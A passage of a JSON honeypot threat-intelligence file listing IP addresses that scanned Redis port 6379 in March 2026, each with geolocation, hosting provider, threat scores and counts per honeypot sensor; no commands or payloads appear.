        "persistence": 15.0,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 7,
        "days_active_30d": 18,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-05T22:34:02.746000+00:00",
        "last_seen_30d": "2026-03-22T18:23:28.393000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4,
        "Redishoneypot": 3
      }
    },
    "182.92.202.149": {
      "attack_count": 24,
      "first_seen": "2026-03-18T03:13:51.000Z",
      "last_seen": "2026-03-18T03:15:02.224Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Beijing",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 45.5,
      "threat_level": "medium",
      "score_components": {
        "frequency": 15.2,
        "persistence": 18.3,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 33,
        "days_active_30d": 22,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-06T12:23:03.954000+00:00",
        "last_seen_30d": "2026-03-27T16:28:04.632000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 15,
        "Cowrie": 12,
        "Redishoneypot": 6
      }
    },
    "8.221.139.48": {
      "attack_count": 24,
      "first_seen": "2026-03-27T07:46:17.000Z",
      "last_seen": "2026-03-27T07:47:31.163Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Japan",
      "country_code": "JP",
      "city": "Tokyo",
      "asn": 45102,
      "as_org": "Alibaba US Technology Co., Ltd.",
      "threat_score": 19.4,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 9.5,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-27T07:46:17+00:00",
        "last_seen_30d": "2026-03-27T07:47:31.163000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 3
      }
    },
    "66.183.91.30": {
      "attack_count": 23,
      "first_seen": "2026-03-02T00:01:04.000Z",
      "last_seen": "2026-03-18T05:48:29.015Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Canada",
      "country_code": "CA",
      "city": "Surrey",
      "asn": 852,
      "as_org": "TELUS Communications",
      "threat_score": 20.2,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.5,
        "persistence": 14.2,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 17,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-02T00:02:07.454000+00:00",
        "last_seen_30d": "2026-03-18T05:48:29.015000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 3
      }
    },
    "35.169.206.177": {
      "attack_count": 22,
      "first_seen": "2026-03-03T04:12:56.000Z",
      "last_seen": "2026-03-27T02:37:37.274Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Ashburn",
      "asn": 14618,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 76.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 26.3,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 430,
        "days_active_30d": 30,
        "ports_targeted_30d": 186,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:05:58.429000+00:00",
        "last_seen_30d": "2026-03-31T19:55:33.003000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 430
      }
    },
    "47.97.229.80": {
      "attack_count": 21,
      "first_seen": "2026-03-02T19:14:07.000Z",
      "last_seen": "2026-03-25T12:50:55.707Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": "Hangzhou",
      "asn": 37963,
      "as_org": "Hangzhou Alibaba Advertising Co.,Ltd.",
      "threat_score": 26.4,
      "threat_level": "low",
      "score_components": {
        "frequency": 6.0,
        "persistence": 20.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 4,
        "days_active_30d": 24,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T19:15:09.300000+00:00",
        "last_seen_30d": "2026-03-25T12:50:55.707000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 4
      }
    },
    "137.184.210.142": {
      "attack_count": 20,
      "first_seen": "2026-03-31T02:02:10.000Z",
      "last_seen": "2026-03-31T02:03:17.689Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 22.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 10,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T02:02:11+00:00",
        "last_seen_30d": "2026-03-31T02:03:17.689000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 8,
        "Suricata": 2
      }
    },
    "147.182.166.69": {
      "attack_count": 20,
      "first_seen": "2026-03-24T01:06:34.000Z",
      "last_seen": "2026-03-24T01:07:43.659Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 17.5,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 10.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 10,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-24T01:06:34+00:00",
        "last_seen_30d": "2026-03-24T01:07:43.659000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 8,
        "Suricata": 2
      }
    },
    "162.243.172.84": {
      "attack_count": 20,
      "first_seen": "2026-03-03T23:46:47.000Z",
      "last_seen": "2026-03-03T23:47:55.165Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 12.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 12.3,
        "persistence": 7.5,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 17,
        "days_active_30d": 9,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T23:46:48+00:00",
        "last_seen_30d": "2026-03-11T00:39:37.369000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 8,
        "Suricata": 7,
        "Honeytrap": 2
      }
    },
    "18.189.74.1": {
      "attack_count": 20,
      "first_seen": "2026-03-18T02:37:11.000Z",
      "last_seen": "2026-03-26T02:38:10.009Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Columbus",
      "asn": 16509,
      "as_org": "Amazon.com, Inc.",
      "threat_score": 76.4,
      "threat_level": "high",
      "score_components": {
        "frequency": 26.4,
        "persistence": 25,
        "diversity": 20,
        "spread": 5,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 433,
        "days_active_30d": 30,
        "ports_targeted_30d": 177,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T01:03:49.027000+00:00",
        "last_seen_30d": "2026-03-31T20:06:34.038000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 433
      }
    },
    "192.241.151.83": {
      "attack_count": 20,
      "first_seen": "2026-03-17T06:22:13.000Z",
      "last_seen": "2026-03-17T06:23:20.983Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 43.1,
      "threat_level": "medium",
      "score_components": {
        "frequency": 26.1,
        "persistence": 5.0,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.57
      },
      "reputation_metrics": {
        "total_events_30d": 407,
        "days_active_30d": 6,
        "ports_targeted_30d": 17,
        "honeypots_triggered_30d": 5,
        "first_seen_30d": "2026-03-13T17:01:54.309000+00:00",
        "last_seen_30d": "2026-03-18T00:34:03.760000+00:00",
        "days_since_last_seen": 13
      },
      "honeypot_breakdown_30d": {
        "Suricata": 268,
        "Honeytrap": 120,
        "Redishoneypot": 8,
        "Dionaea": 6,
        "ElasticPot": 5
      }
    },
    "64.227.106.112": {
      "attack_count": 20,
      "first_seen": "2026-03-02T03:51:51.000Z",
      "last_seen": "2026-03-02T03:52:53.852Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 83.8,
      "threat_level": "critical",
      "score_components": {
        "frequency": 30,
        "persistence": 21.7,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 100180,
        "days_active_30d": 26,
        "ports_targeted_30d": 61734,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-02T03:51:39+00:00",
        "last_seen_30d": "2026-03-27T13:17:13.826000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 90343,
        "Honeytrap": 9784,
        "ConPot": 9,
        "Dionaea": 9,
        "Cowrie": 8,
        "Miniprint": 8,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 1,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "161.35.230.3": {
      "attack_count": 19,
      "first_seen": "2026-03-08T09:33:08.000Z",
      "last_seen": "2026-03-08T09:34:13.842Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 18.1,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 30,
        "persistence": 2.5,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.23
      },
      "reputation_metrics": {
        "total_events_30d": 119364,
        "days_active_30d": 3,
        "ports_targeted_30d": 66535,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-06T12:22:31.187000+00:00",
        "last_seen_30d": "2026-03-08T09:43:59.146000+00:00",
        "days_since_last_seen": 23
      },
      "honeypot_breakdown_30d": {
        "Suricata": 106166,
        "Honeytrap": 13140,
        "Dionaea": 12,
        "ConPot": 10,
        "Cowrie": 8,
        "Miniprint": 8,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "137.184.12.175": {
      "attack_count": 18,
      "first_seen": "2026-03-21T07:17:45.000Z",
      "last_seen": "2026-03-21T07:18:52.011Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Santa Clara",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 56.7,
      "threat_level": "medium",
      "score_components": {
        "frequency": 30,
        "persistence": 10.0,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.67
      },
      "reputation_metrics": {
        "total_events_30d": 127491,
        "days_active_30d": 12,
        "ports_targeted_30d": 63943,
        "honeypots_triggered_30d": 16,
        "first_seen_30d": "2026-03-10T23:31:42+00:00",
        "last_seen_30d": "2026-03-21T07:29:02.407000+00:00",
        "days_since_last_seen": 10
      },
      "honeypot_breakdown_30d": {
        "Suricata": 111481,
        "Honeytrap": 15955,
        "Dionaea": 10,
        "ConPot": 9,
        "Cowrie": 8,
        "Miniprint": 8,
        "Mailoney": 6,
        "Redishoneypot": 3,
        "Adbhoney": 2,
        "Dicompot": 2,
        "ElasticPot": 1,
        "Honeyaml": 1,
        "Ipphoney": 1,
        "Medpot": 1,
        "Tanner": 1
      }
    },
    "52.249.38.143": {
      "attack_count": 18,
      "first_seen": "2026-03-24T15:15:07.000Z",
      "last_seen": "2026-03-30T12:57:19.579Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 26.0,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 5.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 7,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-24T15:15:07+00:00",
        "last_seen_30d": "2026-03-30T12:57:19.579000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Redishoneypot": 6,
        "Suricata": 2
      }
    },
    "68.183.142.129": {
      "attack_count": 17,
      "first_seen": "2026-03-11T18:52:50.000Z",
      "last_seen": "2026-03-11T18:54:01.145Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "North Bergen",
      "asn": 14061,
      "as_org": "DigitalOcean, LLC",
      "threat_score": 12.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 16.1,
        "persistence": 0.8,
        "diversity": 4,
        "spread": 15,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 41,
        "days_active_30d": 1,
        "ports_targeted_30d": 2,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-11T18:52:50+00:00",
        "last_seen_30d": "2026-03-11T23:35:47.259000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 22,
        "Honeytrap": 14,
        "Redishoneypot": 5
      }
    },
    "40.124.173.171": {
      "attack_count": 16,
      "first_seen": "2026-03-23T17:52:34.000Z",
      "last_seen": "2026-03-23T17:55:44.345Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "San Antonio",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 39.8,
      "threat_level": "low",
      "score_components": {
        "frequency": 11.5,
        "persistence": 6.7,
        "diversity": 8,
        "spread": 15,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 14,
        "days_active_30d": 8,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-23T16:33:08.478000+00:00",
        "last_seen_30d": "2026-03-30T04:42:30.216000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 9,
        "Redishoneypot": 3,
        "Honeytrap": 2
      }
    },
    "121.204.160.32": {
      "attack_count": 15,
      "first_seen": "2026-03-24T14:43:09.000Z",
      "last_seen": "2026-03-30T00:19:41.920Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 133774,
      "as_org": "Fuzhou",
      "threat_score": 17.0,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 5.8,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.97
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 7,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-24T14:44:12.541000+00:00",
        "last_seen_30d": "2026-03-30T00:19:41.920000+00:00",
        "days_since_last_seen": 1
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "128.140.124.155": {
      "attack_count": 15,
      "first_seen": "2026-03-02T22:45:20.000Z",
      "last_seen": "2026-03-11T18:26:29.947Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Germany",
      "country_code": "DE",
      "city": "Falkenstein",
      "asn": 24940,
      "as_org": "Hetzner Online GmbH",
      "threat_score": 6.7,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 8.3,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.33
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 10,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-02T22:46:59.509000+00:00",
        "last_seen_30d": "2026-03-11T18:26:29.947000+00:00",
        "days_since_last_seen": 20
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "135.237.126.220": {
      "attack_count": 15,
      "first_seen": "2026-03-28T21:55:20.000Z",
      "last_seen": "2026-03-28T21:56:43.419Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Washington",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 36.5,
      "threat_level": "low",
      "score_components": {
        "frequency": 10.4,
        "persistence": 9.2,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.9
      },
      "reputation_metrics": {
        "total_events_30d": 11,
        "days_active_30d": 11,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-18T02:52:33+00:00",
        "last_seen_30d": "2026-03-28T21:56:43.419000+00:00",
        "days_since_last_seen": 3
      },
      "honeypot_breakdown_30d": {
        "Suricata": 6,
        "Redishoneypot": 3,
        "Honeytrap": 2
      }
    },
    "154.118.228.190": {
      "attack_count": 15,
      "first_seen": "2026-03-18T03:41:56.000Z",
      "last_seen": "2026-03-23T23:57:12.565Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Tanzania",
      "country_code": "TZ",
      "city": null,
      "asn": 327795,
      "as_org": "Tanzania-e-Government-Agency",
      "threat_score": 12.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 5.0,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.77
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 6,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-18T03:43:07.223000+00:00",
        "last_seen_30d": "2026-03-23T23:57:12.565000+00:00",
        "days_since_last_seen": 7
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "20.150.193.200": {
      "attack_count": 15,
      "first_seen": "2026-03-15T12:09:44.000Z",
      "last_seen": "2026-03-15T12:11:53.127Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 20.7,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.5,
        "persistence": 8.3,
        "diversity": 6,
        "spread": 15,
        "recency_factor": 0.53
      },
      "reputation_metrics": {
        "total_events_30d": 9,
        "days_active_30d": 10,
        "ports_targeted_30d": 3,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-08T05:22:50.427000+00:00",
        "last_seen_30d": "2026-03-17T03:11:00.135000+00:00",
        "days_since_last_seen": 14
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5,
        "Redishoneypot": 3,
        "Honeytrap": 1
      }
    },
    "20.168.5.42": {
      "attack_count": 15,
      "first_seen": "2026-03-12T04:50:05.000Z",
      "last_seen": "2026-03-12T04:52:53.724Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 61.3,
      "threat_level": "high",
      "score_components": {
        "frequency": 14.9,
        "persistence": 20.8,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 0.87
      },
      "reputation_metrics": {
        "total_events_30d": 31,
        "days_active_30d": 25,
        "ports_targeted_30d": 10,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-03T15:55:26.470000+00:00",
        "last_seen_30d": "2026-03-27T02:29:38.545000+00:00",
        "days_since_last_seen": 4
      },
      "honeypot_breakdown_30d": {
        "Suricata": 21,
        "Honeytrap": 7,
        "Redishoneypot": 3
      }
    },
    "20.169.106.171": {
      "attack_count": 15,
      "first_seen": "2026-03-22T07:09:46.000Z",
      "last_seen": "2026-03-22T07:12:04.553Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Phoenix",
      "asn": 8075,
      "as_org": "Microsoft Corporation",
      "threat_score": 34.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 12.3,
        "persistence": 12.5,
        "diversity": 10,
        "spread": 15,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 17,
        "days_active_30d": 15,
        "ports_targeted_30d": 5,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-08T05:51:37.342000+00:00",
        "last_seen_30d": "2026-03-22T07:12:04.553000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 10,
        "Honeytrap": 4,
        "Redishoneypot": 3
      }
    },
    "210.245.79.89": {
      "attack_count": 15,
      "first_seen": "2026-03-22T06:07:59.000Z",
      "last_seen": "2026-03-23T01:15:34.397Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Vietnam",
      "country_code": "VN",
      "city": "Hanoi",
      "asn": 18403,
      "as_org": "FPT Telecom Company",
      "threat_score": 9.9,
      "threat_level": "minimal",
      "score_components": {
        "frequency": 4.8,
        "persistence": 1.7,
        "diversity": 2,
        "spread": 5,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 3,
        "days_active_30d": 2,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 1,
        "first_seen_30d": "2026-03-22T06:09:39.086000+00:00",
        "last_seen_30d": "2026-03-23T01:15:34.397000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 3
      }
    },
    "46.175.135.6": {
      "attack_count": 14,
      "first_seen": "2026-03-22T13:07:00.000Z",
      "last_seen": "2026-03-22T13:17:12.289Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United Kingdom",
      "country_code": "GB",
      "city": null,
      "asn": 60592,
      "as_org": "Gransy s.r.o.",
      "threat_score": 45.8,
      "threat_level": "medium",
      "score_components": {
        "frequency": 19.5,
        "persistence": 0.8,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.7
      },
      "reputation_metrics": {
        "total_events_30d": 90,
        "days_active_30d": 1,
        "ports_targeted_30d": 45,
        "honeypots_triggered_30d": 7,
        "first_seen_30d": "2026-03-22T13:07:58.824000+00:00",
        "last_seen_30d": "2026-03-22T13:18:35.847000+00:00",
        "days_since_last_seen": 9
      },
      "honeypot_breakdown_30d": {
        "Suricata": 69,
        "Honeytrap": 12,
        "Redishoneypot": 4,
        "Dionaea": 2,
        "Ciscoasa": 1,
        "ElasticPot": 1,
        "Tanner": 1
      }
    },
    "182.138.158.236": {
      "attack_count": 13,
      "first_seen": "2026-03-31T23:18:36.000Z",
      "last_seen": "2026-03-31T23:19:43.936Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "China",
      "country_code": "CN",
      "city": null,
      "asn": 4134,
      "as_org": "Chinanet",
      "threat_score": 21.9,
      "threat_level": "low",
      "score_components": {
        "frequency": 9.0,
        "persistence": 0.8,
        "diversity": 2,
        "spread": 10,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 8,
        "days_active_30d": 1,
        "ports_targeted_30d": 1,
        "honeypots_triggered_30d": 2,
        "first_seen_30d": "2026-03-31T23:18:37+00:00",
        "last_seen_30d": "2026-03-31T23:19:43.936000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 5,
        "Redishoneypot": 3
      }
    },
    "194.187.178.34": {
      "attack_count": 13,
      "first_seen": "2026-03-25T22:12:37.000Z",
      "last_seen": "2026-03-25T22:13:47.701Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "Hong Kong",
      "country_code": "HK",
      "city": null,
      "asn": 215778,
      "as_org": "Alpha Strike Labs GmbH",
      "threat_score": 42.2,
      "threat_level": "medium",
      "score_components": {
        "frequency": 11.5,
        "persistence": 18.3,
        "diversity": 8,
        "spread": 15,
        "recency_factor": 0.8
      },
      "reputation_metrics": {
        "total_events_30d": 14,
        "days_active_30d": 22,
        "ports_targeted_30d": 4,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-04T16:15:42.466000+00:00",
        "last_seen_30d": "2026-03-25T22:13:47.701000+00:00",
        "days_since_last_seen": 6
      },
      "honeypot_breakdown_30d": {
        "Suricata": 7,
        "Redishoneypot": 6,
        "Dionaea": 1
      }
    },
    "91.230.168.20": {
      "attack_count": 13,
      "first_seen": "2026-03-14T15:27:41.000Z",
      "last_seen": "2026-03-14T15:29:04.574Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": "Hillsboro",
      "asn": 213412,
      "as_org": "ONYPHE SAS",
      "threat_score": 82.2,
      "threat_level": "critical",
      "score_components": {
        "frequency": 22.2,
        "persistence": 25,
        "diversity": 20,
        "spread": 15,
        "recency_factor": 1.0
      },
      "reputation_metrics": {
        "total_events_30d": 167,
        "days_active_30d": 30,
        "ports_targeted_30d": 56,
        "honeypots_triggered_30d": 3,
        "first_seen_30d": "2026-03-02T08:42:38.004000+00:00",
        "last_seen_30d": "2026-03-31T21:47:37.317000+00:00",
        "days_since_last_seen": 0
      },
      "honeypot_breakdown_30d": {
        "Suricata": 123,
        "Honeytrap": 41,
        "Redishoneypot": 3
      }
    },
    "167.94.138.115": {
      "attack_count": 12,
      "first_seen": "2026-03-15T00:30:45.000Z",
      "last_seen": "2026-03-15T00:31:53.224Z",
      "sessions": 0,
      "ports": [
        6379
      ],
      "commands_executed": [],
      "attack_types": [
        "scanning"
      ],
      "country": "United States",
      "country_code": "US",
      "city": null,
      "asn": 398324,
      "as_org": "Censys, Inc.",
      "threat_score": 62.6,
      "threat_level": "high",
      "score_components": {
        "frequency": 22.1,
        "persistence": 18.3,
        "diversity": 20,
        "spread": 25,
        "recency_factor": 0.73
      },
      "reputation_metrics": {
        "total_events_30d": 162,
        "days_active_30d": 22,
        "ports_targeted_30d": 34,
        "honeypots_triggered_30d": 6,
        "first_seen_30d": "2026-03-02T03:18:44+00:00",
        "last_seen_30d": "2026-03-23T00:12:56.545000+00:00",
        "days_since_last_seen": 8
      },
      "honeypot_breakdown_30d": {
        "Suricata": 99,
        "Honeytrap": 49,
        "Redishoneypot": 6,
        "H0neytr4p": 4,
        "Dionaea": 2,
        "Honeyaml": 2
      }
    },
    "206.168.34.204": {
      "attack_count": 12,
      "first_seen": "2026-03-12T12:40:32.000Z",
      "last_seen": "2026-03-12T12:41:54.553Z",
      "sessions": 0,
      "ports": [
        6379
